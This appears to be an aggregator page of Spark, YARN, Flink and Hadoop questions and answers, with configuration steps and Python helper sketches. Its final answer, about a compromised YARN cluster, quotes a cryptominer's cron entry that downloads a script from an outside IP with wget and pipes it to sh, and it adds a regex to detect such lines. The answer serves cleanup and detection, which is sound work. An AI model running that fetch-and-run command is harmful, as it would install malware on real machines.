yarn | 易学教程

Spark - Call Spark jar from java with arguments [closed]

Question: I would like to call a Spark jar from Java (to run a Spark process on YARN), and I am trying to use the code from this link. It looks like a fit for my case, but I need to pass a HashMap and some Java values to the Spark jar. Is it possible to pass a Java object to a Spark jar? And is the Java side able to know how much Spark
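Because the Spark job runs in a separate process, a map cannot be handed over as a live object; it has to be serialized into something that survives the command line. The sketch below illustrates one way to do that, written in Python for brevity: it encodes the map as a single JSON string and appends it as an application argument after the jar path. The jar name, main class, and map keys are hypothetical, and the Spark job is assumed to parse its first argument as JSON.

```python
import json
import shlex


def build_spark_submit(jar_path, main_class, params):
    """Build a spark-submit argument list that carries `params` as one JSON argument."""
    # Serialize the map into a single string; the job is assumed to decode args[0].
    payload = json.dumps(params, sort_keys=True)
    return [
        "spark-submit",
        "--master", "yarn",
        "--deploy-mode", "cluster",
        "--class", main_class,
        jar_path,   # everything after the jar is passed to the application's main()
        payload,
    ]


# Hypothetical jar, class, and parameters, used only for illustration.
cmd = build_spark_submit(
    "my-spark-job.jar",
    "com.example.Main",
    {"inputPath": "/data/in", "threshold": 5},
)
print(" ".join(shlex.quote(part) for part in cmd))
```

The same list could be handed to a process launcher on the Java side; only values that can be represented as text (or as a file the job can read) make the trip.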

spark - application returns different results based on different executor memory?

I am noticing some peculiar behaviour. I have a Spark job that reads data, does some grouping, ordering, and joins, and creates an output file. The issue appears when I run the same job on YARN with more memory than the environment has, e.g. the cluster has 50 GB and I call spark-submit with close to 60 GB of executor memory and 4 GB of driver memory. The results shrink; it seems that one of the data partitions or tasks is lost while processing. --driver-memory 4g --executor-memory 4g --num-executors 12 I also notice this warning message on the driver: WARN util.Utils: Truncated the string representation of
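The flags in the question can be turned into a rough estimate of what YARN is asked to provide. The sketch below assumes each container is the JVM heap plus a memory overhead of 10% of the heap with a 384 MB floor; that overhead rule is an assumption that depends on the Spark version and configuration, and the driver is assumed to run in its own YARN container (cluster mode). Rounding by the YARN scheduler is not modeled.

```python
def container_mb(heap_mb, overhead_factor=0.10, overhead_min_mb=384):
    """Estimate one YARN container: heap plus an assumed memory overhead."""
    overhead = max(int(heap_mb * overhead_factor), overhead_min_mb)
    return heap_mb + overhead


# Values taken from the flags in the question: 4g driver, 4g executors, 12 executors.
executor_mb = container_mb(4 * 1024)
driver_mb = container_mb(4 * 1024)
total_mb = 12 * executor_mb + driver_mb

print(f"per executor: {executor_mb} MB")
print(f"total request: {total_mb} MB ({total_mb / 1024:.1f} GB)")
```

Under these assumptions the request comes to roughly 57 GB, which is consistent with the "close to 60 GB" against a 50 GB cluster described in the question.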

Flink Architecture, Principles, and Deployment Testing

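Apache Flink is an open-source computing platform for distributed stream processing and batch processing. On top of a single Flink runtime, it supports both streaming and batch applications. Existing open-source solutions treat stream processing and batch processing as two different application types because the SLAs (Service-Level Agreements) they offer are completely different: stream processing generally needs low latency and exactly-once guarantees, while batch processing needs high throughput and efficient processing. Flink looks at the two from a different angle and unifies them: Flink fully supports stream processing, meaning that when data is viewed as a stream the input is unbounded; batch processing is treated as a special kind of stream processing whose input stream is defined as bounded. Flink stream-processing features: high-throughput, low-latency, high-performance stream processing; window operations with event time; exactly-once semantics for stateful computation; highly flexible window operations based on time, count, session, and data-driven triggers; a continuous streaming model with backpressure; fault tolerance based on lightweight distributed snapshots; a single runtime that supports both batch-on-streaming and streaming processing; Flink's own memory management implemented inside the JVM; iterative computation; automatic program optimization that avoids expensive operations such as shuffles and sorts in certain cases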
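The idea that batch is just a bounded stream can be illustrated without any Flink code. The following is a conceptual sketch only, using plain Python generators rather than the Flink API: one operator, `running_sum` (a hypothetical name), is applied unchanged to a bounded input and to an unbounded one.

```python
from itertools import count, islice


def running_sum(stream):
    """A single operator that works on any iterable, bounded or not."""
    total = 0
    for value in stream:
        total += value
        yield total


# "Batch": the input is bounded, so the operator terminates on its own.
bounded_input = [1, 2, 3, 4]
batch_result = list(running_sum(bounded_input))

# "Streaming": the input never ends, so we only ever observe a prefix of the output.
unbounded_input = count(1)
stream_prefix = list(islice(running_sum(unbounded_input), 4))

print(batch_result)
print(stream_prefix)
```

The operator itself does not know which kind of input it received; only the source decides whether the computation ends.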

Apache Flink: Features, Concepts, Component Stack, Architecture, and Principles

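Apache Flink is an open-source computing platform for distributed stream processing and batch processing. On top of a single Flink runtime (Flink Runtime), it supports both streaming and batch applications. Existing open-source solutions treat stream processing and batch processing as two different application types because the SLAs they offer are completely different: stream processing generally needs low latency and exactly-once guarantees, while batch processing needs high throughput and efficient processing. As a result, implementations usually provide two separate approaches, or rely on a separate open-source framework for each kind of processing. For example, open-source batch solutions include MapReduce, Tez, Crunch, and Spark, and open-source streaming solutions include Samza and Storm. Flink implements stream and batch processing quite differently from these traditional approaches: it looks at the two from a different angle and unifies them. Flink fully supports stream processing, meaning that when data is viewed as a stream the input is unbounded; batch processing is treated as a special kind of stream processing whose input stream is defined as bounded. On the same Flink runtime, Flink provides separate stream-processing and batch-processing APIs, and these two APIs are also the foundation for higher-level frameworks aimed at streaming and batch applications. Basic features: regarding the features Flink supports, I only give a brief categorized overview here; the specific concepts and principles involved are explained in detail in later sections. Stream-processing features: high-throughput, low-latency, high-performance stream processing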

Differences Between the Three Spark Cluster Deployment Modes

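Spark's main resource-management options, in ranked order, are Hadoop YARN, Standalone, and Mesos. On a single machine, Spark can also run in the most basic local mode. Apache Spark currently supports three distributed deployment modes: standalone, Spark on Mesos, and Spark on YARN. The first resembles the model used by MapReduce 1.0 and implements fault tolerance and resource management internally. The latter two are the direction of future development: part of the fault tolerance and resource management is handed to a unified resource-management system, so that Spark runs on a general-purpose resource manager and can share one cluster's resources with other computing frameworks such as MapReduce. The biggest benefits are lower operations cost and higher resource utilization (resources are allocated on demand). This article introduces the three deployment modes and compares their strengths and weaknesses. 1. Standalone mode: the independent mode ships with complete services and can be deployed to a cluster on its own, without depending on any other resource-management system. To some extent, this mode is the basis for the other two. Borrowing from how Spark was developed, we get a general approach to building a new computing framework: first design its standalone mode, initially ignoring the fault tolerance of its services (such as master/slave) for the sake of rapid development, and then develop a wrapper that deploys the standalone-mode services unchanged onto a resource-management system such as YARN or Mesos, which takes charge of the fault tolerance of the services themselves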
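From the submitter's point of view, the deployment modes above differ mainly in the master URL given to Spark. The sketch below maps each mode to its usual URL form; the host name is a placeholder, and the ports shown are the conventional defaults, which a real cluster may override.

```python
def master_url(mode, host="master-host"):
    """Return the usual Spark master URL form for a deployment mode."""
    urls = {
        "local": "local[*]",                  # single machine, all available cores
        "standalone": f"spark://{host}:7077",  # Spark's own cluster manager
        "mesos": f"mesos://{host}:5050",       # Spark on Mesos
        "yarn": "yarn",                        # cluster location comes from the Hadoop configuration
    }
    return urls[mode]


for mode in ("local", "standalone", "mesos", "yarn"):
    print(f"{mode:<10} --master {master_url(mode)}")
```

For YARN there is no host in the URL because the ResourceManager address is read from the Hadoop configuration directory.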

Yarn parsing job logs stored in hdfs

Is there any parser I can use to parse the JSON in YARN job logs (.jhist files) stored in HDFS, in order to extract information from it?

The second line in the .jhist file is the Avro schema for the other JSON records in the file, meaning that you can create Avro data out of the .jhist file. For this you could use avro-tools-1.7.7.jar:

    # schema is the second line
    sed -n '2p;3q' file.jhist > schema.avsc
    # removing the first two lines
    sed '1,2d' file.jhist > pfile.jhist
    # finally converting to avro data
    java -jar avro-tools-1.7.7.jar fromjson pfile.jhist --schema-file schema.avsc > file
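If only the JSON content is needed, the same split can be done without avro-tools. The following is a minimal sketch that relies on the layout described above (schema on the second line, one JSON record per line after it); the sample text is made up for illustration and is far simpler than a real .jhist file.

```python
import json


def split_jhist(text):
    """Split .jhist content into (schema, events) using the layout described above."""
    lines = text.splitlines()
    schema = json.loads(lines[1])  # the second line holds the Avro schema
    # Every remaining non-empty line is treated as one JSON record.
    events = [json.loads(line) for line in lines[2:] if line.strip()]
    return schema, events


# Made-up sample content; a real file would be read from HDFS first.
sample = "\n".join([
    "Avro-Json",
    '{"type": "record", "name": "Event", "fields": []}',
    '{"type": "JOB_SUBMITTED", "event": {}}',
    "",
    '{"type": "JOB_FINISHED", "event": {}}',
])

schema, events = split_jhist(sample)
print(schema["name"], [event["type"] for event in events])
```

This skips schema validation entirely, so it suits quick inspection rather than producing Avro data.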

Spark Submit Issue

Question: I am trying to run a fat jar on a Spark cluster using spark-submit. I created the cluster on AWS using the "spark-ec2" executable in the Spark bundle. The command I am using to run the jar file is

    bin/spark-submit --class edu.gatech.cse8803.main.Main --master yarn-cluster ../src1/big-data-hw2-assembly-1.0.jar

At first it gave me the error that at least one of the HADOOP_CONF_DIR or YARN_CONF_DIR environment variables must be set. I didn't know what to set them to, so I used the following

Hadoop 2.7.2 Basic Configuration (YARN Mode)

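Environment setup

a) Install the Oracle JDK and configure JAVA_HOME by appending the following to the end of /etc/profile:

    export JAVA_HOME=/usr/local/jdk1.8.0_73
    export JRE_HOME=${JAVA_HOME}/jre
    export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib
    export PATH=$PATH:${JAVA_HOME}/bin

Don't forget to run source /etc/profile!

b) Create the hadoop user:

    # create the hadoop user
    useradd -m hadoop
    # set the hadoop user's password
    passwd hadoop

Switch to the hadoop user, upload the downloaded hadoop2.7.2 archive to the server, and extract it to /home/hadoop/hadoop-2.7.2.

a) Add Hadoop's bin directories to the environment variables by appending the following to the end of /etc/profile:

    export HADOOP_HOME=/home/hadoop/hadoop-2.7.2
    export PATH=$PATH:${HADOOP_HOME}/bin:${HADOOP_HOME}/sbin

b) Go to the hadoop_home/etc/hadoop/ directory and modify the following files:

1. Modify hadoop-env.sh to configure JAVA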

Spark File Logger in Yarn Mode

Question: I want to create a custom logger that writes messages from executors to a specific folder on a cluster node. I have edited my log4j.properties file in SPARK_HOME/conf/ like this:

    log4j.rootLogger=${root.logger}
    root.logger=WARN,console
    log4j.appender.console=org.apache.log4j.ConsoleAppender
    log4j.appender.console.target=System.err
    log4j.appender.console.layout=org.apache.log4j.PatternLayout
    log4j.appender.console.layout.ConversionPattern=%d{yy/MM/dd HH:mm:ss} %p %c{2}: %m%n
    shell.log

YARN Dr.who Application Attempt appattempt fail

Question: I am getting this error message in my Hadoop cluster. Can someone explain why? Somehow more than 2000 job applications are being created and failing without any reason.

Answer 1: This might be a hack... There is a cryptocurrency miner that creates thousands of jobs like this. Check each node for suspicious cron jobs running as the yarn user and remove them.

    $ sudo -u yarn crontab -e
    */2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1

Then check for a "java" process like this one
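The manual check described in the answer can be partly automated. The sketch below scans crontab text for entries that download something with wget or curl and pipe it straight into a shell, which is the pattern shown in the answer. The function name and the sample crontab are hypothetical, and the regular expression is a rough heuristic rather than a complete detector.

```python
import re

# A wget or curl call whose output is piped directly into sh, bash, or zsh.
PIPE_TO_SHELL = re.compile(r"\b(wget|curl)\b[^|#]*\|\s*(ba|z)?sh\b")


def suspicious_cron_lines(crontab_text):
    """Return the crontab entries that pipe a download into a shell."""
    hits = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # skip blank lines and comments
        if PIPE_TO_SHELL.search(stripped):
            hits.append(stripped)
    return hits


# Hypothetical crontab content, e.g. the output of `sudo -u yarn crontab -l`.
sample = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/rotate-logs.sh
*/2 * * * * wget -q -O - http://example.invalid/cr.sh | sh > /dev/null 2>&1
"""

flagged = suspicious_cron_lines(sample)
for entry in flagged:
    print("suspicious:", entry)
```

Running it against the crontab of the yarn user on every node gives a quick first pass; an empty result does not prove a node is clean.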
